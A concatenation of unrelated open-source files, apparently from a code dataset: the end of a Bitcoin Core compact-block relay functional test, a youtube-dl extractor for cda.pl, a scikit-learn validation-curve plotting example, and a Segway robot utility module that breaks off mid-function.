# that we receive getblocktxn messages back.
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block, use_witness=with_witness)
test_getblocktxn_response(comp_block, test_node, [1, 2, 3, 4, 5])
msg_bt = msg_blocktxn()
if with_witness:
msg_bt = msg_witness_blocktxn() # serialize with witnesses
msg_bt.block_transactions = BlockTransactions(block.sha256, block.vtx[1:])
test_tip_after_message(node, test_node, msg_bt, block.sha256)
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
# Now try interspersing the prefilled transactions
comp_block.initialize_from_block(block, prefill_list=[0, 1, 5], use_witness=with_witness)
test_getblocktxn_response(comp_block, test_node, [2, 3, 4])
msg_bt.block_transactions = BlockTransactions(block.sha256, block.vtx[2:5])
test_tip_after_message(node, test_node, msg_bt, block.sha256)
# Now try giving one transaction ahead of time.
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
test_node.send_and_ping(msg_tx(block.vtx[1]))
assert(block.vtx[1].hash in node.getrawmempool())
# Prefill 4 out of the 6 transactions, and verify that only the one
# that was not in the mempool is requested.
comp_block.initialize_from_block(block, prefill_list=[0, 2, 3, 4], use_witness=with_witness)
test_getblocktxn_response(comp_block, test_node, [5])
msg_bt.block_transactions = BlockTransactions(block.sha256, [block.vtx[5]])
test_tip_after_message(node, test_node, msg_bt, block.sha256)
# Now provide all transactions to the node before the block is
# announced and verify reconstruction happens immediately.
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 10)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
for tx in block.vtx[1:]:
test_node.send_message(msg_tx(tx))
test_node.sync_with_ping()
# Make sure all transactions were accepted.
mempool = node.getrawmempool()
for tx in block.vtx[1:]:
assert(tx.hash in mempool)
# Clear out last request.
with mininode_lock:
test_node.last_message.pop("getblocktxn", None)
# Send compact block
comp_block.initialize_from_block(block, prefill_list=[0], use_witness=with_witness)
test_tip_after_message(node, test_node, msg_cmpctblock(comp_block.to_p2p()), block.sha256)
with mininode_lock:
# Shouldn't have gotten a request for any transaction
assert("getblocktxn" not in test_node.last_message)
# Incorrectly responding to a getblocktxn shouldn't cause the block to be
# permanently failed.
def test_incorrect_blocktxn_response(self, node, test_node, version):
if (len(self.utxos) == 0):
self.make_utxos()
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 10)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
# Relay the first 5 transactions from the block in advance
for tx in block.vtx[1:6]:
test_node.send_message(msg_tx(tx))
test_node.sync_with_ping()
# Make sure all transactions were accepted.
mempool = node.getrawmempool()
for tx in block.vtx[1:6]:
assert(tx.hash in mempool)
# Send compact block
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block, prefill_list=[0], use_witness=(version == 2))
test_node.send_and_ping(msg_cmpctblock(comp_block.to_p2p()))
absolute_indexes = []
with mininode_lock:
assert("getblocktxn" in test_node.last_message)
absolute_indexes = test_node.last_message["getblocktxn"].block_txn_request.to_absolute()
assert_equal(absolute_indexes, [6, 7, 8, 9, 10])
# Now give an incorrect response.
# Note that it's possible for bitcoind to be smart enough to know we're
# lying, since it could check to see if the shortid matches what we're
# sending, and eg disconnect us for misbehavior. If that behavior
# change were made, we could just modify this test by having a
# different peer provide the block further down, so that we're still
# verifying that the block isn't marked bad permanently. This is good
# enough for now.
msg = msg_blocktxn()
if version==2:
msg = msg_witness_blocktxn()
msg.block_transactions = BlockTransactions(block.sha256, [block.vtx[5]] + block.vtx[7:])
test_node.send_and_ping(msg)
# Tip should not have updated
assert_equal(int(node.getbestblockhash(), 16), block.hashPrevBlock)
# We should receive a getdata request
wait_until(lambda: "getdata" in test_node.last_message, timeout=10, lock=mininode_lock)
assert_equal(len(test_node.last_message["getdata"].inv), 1)
assert(test_node.last_message["getdata"].inv[0].type == 2 or test_node.last_message["getdata"].inv[0].type == 2|MSG_WITNESS_FLAG)
assert_equal(test_node.last_message["getdata"].inv[0].hash, block.sha256)
# Deliver the block
if version==2:
test_node.send_and_ping(msg_witness_block(block))
else:
test_node.send_and_ping(msg_block(block))
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
def test_getblocktxn_handler(self, node, test_node, version):
# bitcoind will not send blocktxn responses for blocks whose height is
# more than 10 blocks deep.
MAX_GETBLOCKTXN_DEPTH = 10
chain_height = node.getblockcount()
current_height = chain_height
while (current_height >= chain_height - MAX_GETBLOCKTXN_DEPTH):
block_hash = node.getblockhash(current_height)
block = FromHex(CBlock(), node.getblock(block_hash, False))
msg = msg_getblocktxn()
msg.block_txn_request = BlockTransactionsRequest(int(block_hash, 16), [])
num_to_request = random.randint(1, len(block.vtx))
msg.block_txn_request.from_absolute(sorted(random.sample(range(len(block.vtx)), num_to_request)))
test_node.send_message(msg)
wait_until(lambda: "blocktxn" in test_node.last_message, timeout=10, lock=mininode_lock)
[tx.calc_sha256() for tx in block.vtx]
with mininode_lock:
assert_equal(test_node.last_message["blocktxn"].block_transactions.blockhash, int(block_hash, 16))
all_indices = msg.block_txn_request.to_absolute()
for index in all_indices:
tx = test_node.last_message["blocktxn"].block_transactions.transactions.pop(0)
tx.calc_sha256()
assert_equal(tx.sha256, block.vtx[index].sha256)
if version == 1:
# Witnesses should have been stripped
assert(tx.wit.is_null())
else:
# Check that the witness matches
assert_equal(tx.calc_sha256(True), block.vtx[index].calc_sha256(True))
test_node.last_message.pop("blocktxn", None)
current_height -= 1
# Next request should send a full block response, as we're past the
# allowed depth for a blocktxn response.
block_hash = node.getblockhash(current_height)
msg.block_txn_request = BlockTransactionsRequest(int(block_hash, 16), [0])
with mininode_lock:
test_node.last_message.pop("block", None)
test_node.last_message.pop("blocktxn", None)
test_node.send_and_ping(msg)
with mininode_lock:
test_node.last_message["block"].block.calc_sha256()
assert_equal(test_node.last_message["block"].block.sha256, int(block_hash, 16))
assert "blocktxn" not in test_node.last_message
def test_compactblocks_not_at_tip(self, node, test_node):
# Test that requesting old compactblocks doesn't work.
MAX_CMPCTBLOCK_DEPTH = 5
new_blocks = []
for i in range(MAX_CMPCTBLOCK_DEPTH + 1):
test_node.clear_block_announcement()
new_blocks.append(node.generate(1)[0])
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
test_node.clear_block_announcement()
test_node.send_message(msg_getdata([CInv(4, int(new_blocks[0], 16))]))
wait_until(lambda: "cmpctblock" in test_node.last_message, timeout=30, lock=mininode_lock)
test_node.clear_block_announcement()
node.generate(1)
wait_until(test_node.received_block_announcement, timeout=30, lock=mininode_lock)
test_node.clear_block_announcement()
with mininode_lock:
test_node.last_message.pop("block", None)
test_node.send_message(msg_getdata([CInv(4, int(new_blocks[0], 16))]))
wait_until(lambda: "block" in test_node.last_message, timeout=30, lock=mininode_lock)
with mininode_lock:
test_node.last_message["block"].block.calc_sha256()
assert_equal(test_node.last_message["block"].block.sha256, int(new_blocks[0], 16))
# Generate an old compactblock, and verify that it's not accepted.
cur_height = node.getblockcount()
hashPrevBlock = int(node.getblockhash(cur_height-5), 16)
block = self.build_block_on_tip(node)
block.hashPrevBlock = hashPrevBlock
block.solve()
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block)
test_node.send_and_ping(msg_cmpctblock(comp_block.to_p2p()))
tips = node.getchaintips()
found = False
for x in tips:
if x["hash"] == block.hash:
assert_equal(x["status"], "headers-only")
found = True
break
assert(found)
# Requesting this block via getblocktxn should silently fail
# (to avoid fingerprinting attacks).
msg = msg_getblocktxn()
msg.block_txn_request = BlockTransactionsRequest(block.sha256, [0])
with mininode_lock:
test_node.last_message.pop("blocktxn", None)
test_node.send_and_ping(msg)
with mininode_lock:
assert "blocktxn" not in test_node.last_message
def activate_segwit(self, node):
node.generate(144*3)
assert_equal(get_bip9_status(node, "segwit")["status"], 'active')
def test_end_to_end_block_relay(self, node, listeners):
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 10)
[l.clear_block_announcement() for l in listeners]
# ToHex() won't serialize with witness, but this block has no witnesses
# anyway. TODO: repeat this test with witness tx's to a segwit node.
node.submitblock(ToHex(block))
for l in listeners:
wait_until(lambda: l.received_block_announcement(), timeout=30, lock=mininode_lock)
with mininode_lock:
for l in listeners:
assert "cmpctblock" in l.last_message
l.last_message["cmpctblock"].header_and_shortids.header.calc_sha256()
assert_equal(l.last_message["cmpctblock"].header_and_shortids.header.sha256, block.sha256)
# Test that we don't get disconnected if we relay a compact block with valid header,
# but invalid transactions.
def test_invalid_tx_in_compactblock(self, node, test_node, use_segwit):
assert(len(self.utxos))
utxo = self.utxos[0]
block = self.build_block_with_transactions(node, utxo, 5)
del block.vtx[3]
block.hashMerkleRoot = block.calc_merkle_root()
if use_segwit:
# If we're testing with segwit, also drop the coinbase witness,
# but include the witness commitment.
add_witness_commitment(block)
block.vtx[0].wit.vtxinwit = []
block.solve()
# Now send the compact block with all transactions prefilled, and
# verify that we don't get disconnected.
comp_block = HeaderAndShortIDs()
comp_block.initialize_from_block(block, prefill_list=[0, 1, 2, 3, 4], use_witness=use_segwit)
msg = msg_cmpctblock(comp_block.to_p2p())
test_node.send_and_ping(msg)
# Check that the tip didn't advance
assert(int(node.getbestblockhash(), 16) is not block.sha256)
test_node.sync_with_ping()
# Helper for enabling cb announcements
# Send the sendcmpct request and sync headers
def request_cb_announcements(self, peer, node, version):
tip = node.getbestblockhash()
peer.get_headers(locator=[int(tip, 16)], hashstop=0)
msg = msg_sendcmpct()
msg.version = version
msg.announce = True
peer.send_and_ping(msg)
def test_compactblock_reconstruction_multiple_peers(self, node, stalling_peer, delivery_peer):
assert(len(self.utxos))
def announce_cmpct_block(node, peer):
utxo = self.utxos.pop(0)
block = self.build_block_with_transactions(node, utxo, 5)
cmpct_block = HeaderAndShortIDs()
cmpct_block.initialize_from_block(block)
msg = msg_cmpctblock(cmpct_block.to_p2p())
peer.send_and_ping(msg)
with mininode_lock:
assert "getblocktxn" in peer.last_message
return block, cmpct_block
block, cmpct_block = announce_cmpct_block(node, stalling_peer)
for tx in block.vtx[1:]:
delivery_peer.send_message(msg_tx(tx))
delivery_peer.sync_with_ping()
mempool = node.getrawmempool()
for tx in block.vtx[1:]:
assert(tx.hash in mempool)
delivery_peer.send_and_ping(msg_cmpctblock(cmpct_block.to_p2p()))
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
self.utxos.append([block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue])
# Now test that delivering an invalid compact block won't break relay
block, cmpct_block = announce_cmpct_block(node, stalling_peer)
for tx in block.vtx[1:]:
delivery_peer.send_message(msg_tx(tx))
delivery_peer.sync_with_ping()
cmpct_block.prefilled_txn[0].tx.wit.vtxinwit = [ CTxInWitness() ]
cmpct_block.prefilled_txn[0].tx.wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(0)]
cmpct_block.use_witness = True
delivery_peer.send_and_ping(msg_cmpctblock(cmpct_block.to_p2p()))
assert(int(node.getbestblockhash(), 16) != block.sha256)
msg = msg_blocktxn()
msg.block_transactions.blockhash = block.sha256
msg.block_transactions.transactions = block.vtx[1:]
stalling_peer.send_and_ping(msg)
assert_equal(int(node.getbestblockhash(), 16), block.sha256)
def run_test(self):
# Setup the p2p connections and start up the network thread.
self.test_node = TestNode()
self.segwit_node = TestNode()
self.old_node = TestNode() # version 1 peer <--> segwit node
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], self.test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1],
self.segwit_node, services=NODE_NETWORK|NODE_WITNESS))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1],
self.old_node, services=NODE_NETWORK))
self.test_node.add_connection(connections[0])
self.segwit_node.add_connection(connections[1])
self.old_node.add_connection(connections[2])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
self.test_node.wait_for_verack()
# We will need UTXOs to construct transactions in later tests.
self.make_utxos()
self.log.info("Running tests, pre-segwit activation:")
self.log.info("Testing SENDCMPCT p2p message... ")
self.test_sendcmpct(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_sendcmpct(self.nodes[1], self.segwit_node, 2, old_node=self.old_node)
sync_blocks(self.nodes)
self.log.info("Testing compactblock construction...")
self.test_compactblock_construction(self.nodes[0], self.test_node, 1, False)
sync_blocks(self.nodes)
self.test_compactblock_construction(self.nodes[1], self.segwit_node, 2, False)
sync_blocks(self.nodes)
self.log.info("Testing compactblock requests... ")
self.test_compactblock_requests(self.nodes[0], self.test_node, 1, False)
sync_blocks(self.nodes)
self.test_compactblock_requests(self.nodes[1], self.segwit_node, 2, False)
sync_blocks(self.nodes)
self.log.info("Testing getblocktxn requests...")
self.test_getblocktxn_requests(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_getblocktxn_requests(self.nodes[1], self.segwit_node, 2)
sync_blocks(self.nodes)
self.log.info("Testing getblocktxn handler...")
self.test_getblocktxn_handler(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_getblocktxn_handler(self.nodes[1], self.segwit_node, 2)
self.test_getblocktxn_handler(self.nodes[1], self.old_node, 1)
sync_blocks(self.nodes)
self.log.info("Testing compactblock requests/announcements not at chain tip...")
self.test_compactblocks_not_at_tip(self.nodes[0], self.test_node)
sync_blocks(self.nodes)
self.test_compactblocks_not_at_tip(self.nodes[1], self.segwit_node)
self.test_compactblocks_not_at_tip(self.nodes[1], self.old_node)
sync_blocks(self.nodes)
self.log.info("Testing handling of incorrect blocktxn responses...")
self.test_incorrect_blocktxn_response(self.nodes[0], self.test_node, 1)
sync_blocks(self.nodes)
self.test_incorrect_blocktxn_response(self.nodes[1], self.segwit_node, 2)
sync_blocks(self.nodes)
# End-to-end block relay tests
self.log.info("Testing end-to-end block relay...")
self.request_cb_announcements(self.test_node, self.nodes[0], 1)
self.request_cb_announcements(self.old_node, self.nodes[1], 1)
self.request_cb_announcements(self.segwit_node, self.nodes[1], 2)
self.test_end_to_end_block_relay(self.nodes[0], [self.segwit_node, self.test_node, self.old_node])
self.test_end_to_end_block_relay(self.nodes[1], [self.segwit_node, self.test_node, self.old_node])
self.log.info("Testing handling of invalid compact blocks...")
self.test_invalid_tx_in_compactblock(self.nodes[0], self.test_node, False)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.segwit_node, False)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.old_node, False)
self.log.info("Testing reconstructing compact blocks from all peers...")
self.test_compactblock_reconstruction_multiple_peers(self.nodes[1], self.segwit_node, self.old_node)
sync_blocks(self.nodes)
# Advance to segwit activation
self.log.info("Advancing to segwit activation")
self.activate_segwit(self.nodes[1])
self.log.info("Running tests, post-segwit activation...")
self.log.info("Testing compactblock construction...")
self.test_compactblock_construction(self.nodes[1], self.old_node, 1, True)
self.test_compactblock_construction(self.nodes[1], self.segwit_node, 2, True)
sync_blocks(self.nodes)
self.log.info("Testing compactblock requests (unupgraded node)... ")
self.test_compactblock_requests(self.nodes[0], self.test_node, 1, True)
self.log.info("Testing getblocktxn requests (unupgraded node)...")
self.test_getblocktxn_requests(self.nodes[0], self.test_node, 1)
# Need to manually sync node0 and node1, because post-segwit activation,
# node1 will not download blocks from node0.
self.log.info("Syncing nodes...")
assert(self.nodes[0].getbestblockhash() != self.nodes[1].getbestblockhash())
while (self.nodes[0].getblockcount() > self.nodes[1].getblockcount()):
block_hash = self.nodes[0].getblockhash(self.nodes[1].getblockcount()+1)
self.nodes[1].submitblock(self.nodes[0].getblock(block_hash, False))
assert_equal(self.nodes[0].getbestblockhash(), self.nodes[1].getbestblockhash())
self.log.info("Testing compactblock requests (segwit node)... ")
self.test_compactblock_requests(self.nodes[1], self.segwit_node, 2, True)
self.log.info("Testing getblocktxn requests (segwit node)...")
self.test_getblocktxn_requests(self.nodes[1], self.segwit_node, 2)
sync_blocks(self.nodes)
self.log.info("Testing getblocktxn handler (segwit node should return witnesses)...")
self.test_getblocktxn_handler(self.nodes[1], self.segwit_node, 2)
self.test_getblocktxn_handler(self.nodes[1], self.old_node, 1)
# Test that if we submitblock to node1, we'll get a compact block
# announcement to all peers.
# (Post-segwit activation, blocks won't propagate from node0 to node1
# automatically, so don't bother testing a block announced to node0.)
self.log.info("Testing end-to-end block relay...")
self.request_cb_announcements(self.test_node, self.nodes[0], 1)
self.request_cb_announcements(self.old_node, self.nodes[1], 1)
self.request_cb_announcements(self.segwit_node, self.nodes[1], 2)
self.test_end_to_end_block_relay(self.nodes[1], [self.segwit_node, self.test_node, self.old_node])
self.log.info("Testing handling of invalid compact blocks...")
self.test_invalid_tx_in_compactblock(self.nodes[0], self.test_node, False)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.segwit_node, True)
self.test_invalid_tx_in_compactblock(self.nodes[1], self.old_node, True)
self.log.info("Testing invalid index in cmpctblock message...")
self.test_invalid_cmpctblock_message()
if __name__ == '__main__':
CompactBlocksTest().main()
|
yasoob/youtube-dl-GUI | refs/heads/master | youtube_dl/extractor/cda.py | 3 | # coding: utf-8
from __future__ import unicode_literals
import codecs
import re
from .common import InfoExtractor
from ..compat import (
compat_chr,
compat_ord,
compat_urllib_parse_unquote,
)
from ..utils import (
ExtractorError,
float_or_none,
int_or_none,
merge_dicts,
multipart_encode,
parse_duration,
random_birthday,
urljoin,
)
class CDAIE(InfoExtractor):
_VALID_URL = r'https?://(?:(?:www\.)?cda\.pl/video|ebd\.cda\.pl/[0-9]+x[0-9]+)/(?P<id>[0-9a-z]+)'
_BASE_URL = 'http://www.cda.pl/'
_TESTS = [{
'url': 'http://www.cda.pl/video/5749950c',
'md5': '6f844bf51b15f31fae165365707ae970',
'info_dict': {
'id': '5749950c',
'ext': 'mp4',
'height': 720,
'title': 'Oto dlaczego przed zakrętem należy zwolnić.',
'description': 'md5:269ccd135d550da90d1662651fcb9772',
'thumbnail': r're:^https?://.*\.jpg$',
'average_rating': float,
'duration': 39,
'age_limit': 0,
}
}, {
'url': 'http://www.cda.pl/video/57413289',
'md5': 'a88828770a8310fc00be6c95faf7f4d5',
'info_dict': {
'id': '57413289',
'ext': 'mp4',
'title': 'Lądowanie na lotnisku na Maderze',
'description': 'md5:60d76b71186dcce4e0ba6d4bbdb13e1a',
'thumbnail': r're:^https?://.*\.jpg$',
'uploader': 'crash404',
'view_count': int,
'average_rating': float,
'duration': 137,
'age_limit': 0,
}
}, {
# Age-restricted
'url': 'http://www.cda.pl/video/1273454c4',
'info_dict': {
'id': '1273454c4',
'ext': 'mp4',
'title': 'Bronson (2008) napisy HD 1080p',
'description': 'md5:1b6cb18508daf2dc4e0fa4db77fec24c',
'height': 1080,
'uploader': 'boniek61',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 5554,
'age_limit': 18,
'view_count': int,
'average_rating': float,
},
}, {
'url': 'http://ebd.cda.pl/0x0/5749950c',
'only_matching': True,
}]
def _download_age_confirm_page(self, url, video_id, *args, **kwargs):
form_data = random_birthday('rok', 'miesiac', 'dzien')
form_data.update({'return': url, 'module': 'video', 'module_id': video_id})
data, content_type = multipart_encode(form_data)
return self._download_webpage(
urljoin(url, '/a/validatebirth'), video_id, *args,
data=data, headers={
'Referer': url,
'Content-Type': content_type,
}, **kwargs)
def _real_extract(self, url):
video_id = self._match_id(url)
self._set_cookie('cda.pl', 'cda.player', 'html5')
webpage = self._download_webpage(
self._BASE_URL + '/video/' + video_id, video_id)
if 'Ten film jest dostępny dla użytkowników premium' in webpage:
raise ExtractorError('This video is only available for premium users.', expected=True)
if re.search(r'niedostępn[ey] w(?: |\s+)Twoim kraju\s*<', webpage):
self.raise_geo_restricted()
need_confirm_age = False
if self._html_search_regex(r'(<form[^>]+action="[^"]*/a/validatebirth[^"]*")',
webpage, 'birthday validate form', default=None):
webpage = self._download_age_confirm_page(
url, video_id, note='Confirming age')
need_confirm_age = True
formats = []
uploader = self._search_regex(r'''(?x)
<(span|meta)[^>]+itemprop=(["\'])author\2[^>]*>
(?:<\1[^>]*>[^<]*</\1>|(?!</\1>)(?:.|\n))*?
<(span|meta)[^>]+itemprop=(["\'])name\4[^>]*>(?P<uploader>[^<]+)</\3>
''', webpage, 'uploader', default=None, group='uploader')
view_count = self._search_regex(
r'Odsłony:(?:\s| )*([0-9]+)', webpage,
'view_count', default=None)
average_rating = self._search_regex(
(r'<(?:span|meta)[^>]+itemprop=(["\'])ratingValue\1[^>]*>(?P<rating_value>[0-9.]+)',
r'<span[^>]+\bclass=["\']rating["\'][^>]*>(?P<rating_value>[0-9.]+)'), webpage, 'rating', fatal=False,
group='rating_value')
info_dict = {
'id': video_id,
'title': self._og_search_title(webpage),
'description': self._og_search_description(webpage),
'uploader': uploader,
'view_count': int_or_none(view_count),
'average_rating': float_or_none(average_rating),
'thumbnail': self._og_search_thumbnail(webpage),
'formats': formats,
'duration': None,
'age_limit': 18 if need_confirm_age else 0,
}
info = self._search_json_ld(webpage, video_id, default={})
# Source: https://www.cda.pl/js/player.js?t=1606154898
def decrypt_file(a):
for p in ('_XDDD', '_CDA', '_ADC', '_CXD', '_QWE', '_Q5', '_IKSDE'):
a = a.replace(p, '')
a = compat_urllib_parse_unquote(a)
b = []
for c in a:
f = compat_ord(c)
b.append(compat_chr(33 + (f + 14) % 94) if 33 <= f and 126 >= f else compat_chr(f))
a = ''.join(b)
a = a.replace('.cda.mp4', '')
for p in ('.2cda.pl', '.3cda.pl'):
a = a.replace(p, '.cda.pl')
if '/upstream' in a:
a = a.replace('/upstream', '.mp4/upstream')
return 'https://' + a
return 'https://' + a + '.mp4'
def extract_format(page, version):
json_str = self._html_search_regex(
r'player_data=(\\?["\'])(?P<player_data>.+?)\1', page,
'%s player_json' % version, fatal=False, group='player_data')
if not json_str:
return
player_data = self._parse_json(
json_str, '%s player_data' % version, fatal=False)
if not player_data:
return
video = player_data.get('video')
if not video or 'file' not in video:
self.report_warning('Unable to extract %s version information' % version)
return
if video['file'].startswith('uggc'):
video['file'] = codecs.decode(video['file'], 'rot_13')
if video['file'].endswith('adc.mp4'):
video['file'] = video['file'].replace('adc.mp4', '.mp4')
elif not video['file'].startswith('http'):
video['file'] = decrypt_file(video['file'])
f = {
'url': video['file'],
}
m = re.search(
r'<a[^>]+data-quality="(?P<format_id>[^"]+)"[^>]+href="[^"]+"[^>]+class="[^"]*quality-btn-active[^"]*">(?P<height>[0-9]+)p',
page)
if m:
f.update({
'format_id': m.group('format_id'),
'height': int(m.group('height')),
})
info_dict['formats'].append(f)
if not info_dict['duration']:
info_dict['duration'] = parse_duration(video.get('duration'))
extract_format(webpage, 'default')
for href, resolution in re.findall(
r'<a[^>]+data-quality="[^"]+"[^>]+href="([^"]+)"[^>]+class="quality-btn"[^>]*>([0-9]+p)',
webpage):
if need_confirm_age:
handler = self._download_age_confirm_page
else:
handler = self._download_webpage
webpage = handler(
urljoin(self._BASE_URL, href), video_id,
'Downloading %s version information' % resolution, fatal=False)
if not webpage:
# Manually report warning because empty page is returned when
# invalid version is requested.
self.report_warning('Unable to download %s version information' % resolution)
continue
extract_format(webpage, resolution)
self._sort_formats(formats)
return merge_dicts(info_dict, info)
|
cainiaocome/scikit-learn | refs/heads/master | examples/model_selection/plot_validation_curve.py | 229 | """
==========================
Plotting Validation Curves
==========================
In this plot you can see the training scores and validation scores of an SVM
for different values of the kernel parameter gamma. For very low values of
gamma, you can see that both the training score and the validation score are
low. This is called underfitting. Medium values of gamma will result in high
values for both scores, i.e. the classifier is performing fairly well. If gamma
is too high, the classifier will overfit, which means that the training score
is good but the validation score is poor.
"""
print(__doc__)
import matplotlib.pyplot as plt
import numpy as np
from sklearn.datasets import load_digits
from sklearn.svm import SVC
from sklearn.learning_curve import validation_curve
digits = load_digits()
X, y = digits.data, digits.target
param_range = np.logspace(-6, -1, 5)
train_scores, test_scores = validation_curve(
SVC(), X, y, param_name="gamma", param_range=param_range,
cv=10, scoring="accuracy", n_jobs=1)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
plt.title("Validation Curve with SVM")
plt.xlabel("$\gamma$")
plt.ylabel("Score")
plt.ylim(0.0, 1.1)
plt.semilogx(param_range, train_scores_mean, label="Training score", color="r")
plt.fill_between(param_range, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.2, color="r")
plt.semilogx(param_range, test_scores_mean, label="Cross-validation score",
color="g")
plt.fill_between(param_range, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.2, color="g")
plt.legend(loc="best")
plt.show()
|
iron-ox/segway_v3 | refs/heads/iron-master | segway_ros/src/segway/utils.py | 1 | """--------------------------------------------------------------------
COPYRIGHT 2014 Stanley Innovation Inc.
Software License Agreement:
The software supplied herewith by Stanley Innovation Inc. (the "Company")
for its licensed Segway RMP Robotic Platforms is intended and supplied to you,
the Company's customer, for use solely and exclusively with Stanley Innovation
products. The software is owned by the Company and/or its supplier, and is
protected under applicable copyright laws. All rights are reserved. Any use in
violation of the foregoing restrictions may subject the user to criminal
sanctions under applicable laws, as well as to civil liability for the
breach of the terms and conditions of this license. The Company may
immediately terminate this Agreement upon your use of the software with
any products that are not Stanley Innovation products.
The software was written using Python programming language. Your use
of the software is therefore subject to the terms and conditions of the
OSI- approved open source license viewable at http://www.python.org/.
You are solely responsible for ensuring your compliance with the Python
open source license.
You shall indemnify, defend and hold the Company harmless from any claims,
demands, liabilities or expenses, including reasonable attorneys fees, incurred
by the Company as a result of any claim or proceeding against the Company
arising out of or based upon:
(i) The combination, operation or use of the software by you with any hardware,
products, programs or data not supplied or approved in writing by the Company,
if such claim or proceeding would have been avoided but for such combination,
operation or use.
(ii) The modification of the software by or on behalf of you
(iii) Your use of the software.
THIS SOFTWARE IS PROVIDED IN AN "AS IS" CONDITION. NO WARRANTIES,
WHETHER EXPRESS, IMPLIED OR STATUTORY, INCLUDING, BUT NOT LIMITED
TO, IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE APPLY TO THIS SOFTWARE. THE COMPANY SHALL NOT,
IN ANY CIRCUMSTANCES, BE LIABLE FOR SPECIAL, INCIDENTAL OR
CONSEQUENTIAL DAMAGES, FOR ANY REASON WHATSOEVER.
\file utils.py
\brief This module contains general utility functions
\Platform: Linux/ROS Indigo
--------------------------------------------------------------------"""
import struct
import socket
import math
import crc16
import array
from system_defines import *
"""
slew limit funtion to limit the maximum rate of change
"""
def slew_limit(signal_in,signal_out,max_rate,dt):
if (0 == dt):
return
requested_rate = (signal_in - signal_out)/dt
if (requested_rate > max_rate):
signal_out += max_rate * dt
elif (requested_rate >= -max_rate):
signal_out = signal_in
else:
signal_out += -max_rate * dt
return signal_out
"""
Make a 16-bit value from two 8-bit values
"""
def m16(byte_array):
return (( byte_array[0] << 8) & 0xFF00) | (byte_array[1] & 0x00FF)
"""
Make a 32-bit value from four 8-bit values
"""
def m32(byte_array):
ret = 0;
ret |= (byte_array[0] & 0xFF) << 24
ret |= (byte_array[1] & 0xFF) << 16
ret |= (byte_array[2] & 0xFF) << 8
ret |= (byte_array[3] & 0xFF)
return ret
def generate_cmd_bytes(cmd):
cmd_bytes = []
add_bytes(cmd_bytes,cmd[0],16)
for cmd_var in cmd[1]:
add_bytes(cmd_bytes,cmd_var,32)
"""
Generate the CRC for the command bytes
"""
crc16.compute_buffer_crc(cmd_bytes)
return cmd_bytes
def validate_response(rsp):
"""
Check the CRC and
"""
data = array.array('B',rsp)
data = array.array('I',data.tostring())
final_data = data
rsp = array.array('B',data.tostring())
if (crc16.buffer_crc_is_valid(rsp)) and (len(rsp) > 0):
return True,final_data[:len(final_data)-1]
"""
Not a valid CRC
"""
return False,None
def add_bytes(list_to_append,var2,bits):
if bits % 2:
return False
bytes_to_make = bits/8
for i in range(0,bytes_to_make):
shift = bits - 8*(i+1)
list_to_append.append((var2 >> shift) & 0xFF)
"""
For IEEE754 processors this function converts a 32-bit floating point number to
a 32-bit integer representation
"""
def convert_float_to_u32(value):
return struct.unpack('=I', struct.pack('=f', value))[0]
"""
For IEEE754 processors this function converts a 32-bit integer representation
of a floating point value to float representation
"""
def convert_u32_to_float(bits):
return struct.unpack('=f', struct.pack('=I', bits))[0]
def convert_u64_to_double(high_word,low_word):
temp = (high_word << 32) & 0xFFFFFFFF00000000
temp |= (low_word & 0x00000000FFFFFFFF)
return struct.unpack('=d', struct.pack('=Q', temp))[0]
"""
Used to convert a byte array (string) into an array of 32-bit values
"""
def convert_byte_data_to_U32(data):
rx_dat = [];
k = 0;
#
# Convert the string into a byte array
#
for x in range(0,len(data)):
rx_dat.append(ord(data[x]));
number_of_u32s = (len(rx_dat)/4)
#
# Convert the byte array into an array of 32bit values
#
converted = [0]*number_of_u32s;
for x in range(0,number_of_u32s):
converted[x] = int((((rx_dat[k] << 24) & 0xFF000000)) |
(((rx_dat[k+1] << 16) & 0x00FF0000)) |
(((rx_dat[k+2] << 8) & 0x0000FF00)) |
(rx_dat[k+3] & 0x000000FF));
k+=4;
return converted;
"""
Used to convert an IP address string in dotted quad format to an integer
"""
def dottedQuadToNum(ip):
"convert decimal dotted quad string to long integer"
return struct.unpack('I',socket.inet_aton(ip))[0]
"""
Used to convert an IP address in integer format to a dotted quad string
"""
def numToDottedQuad(n):
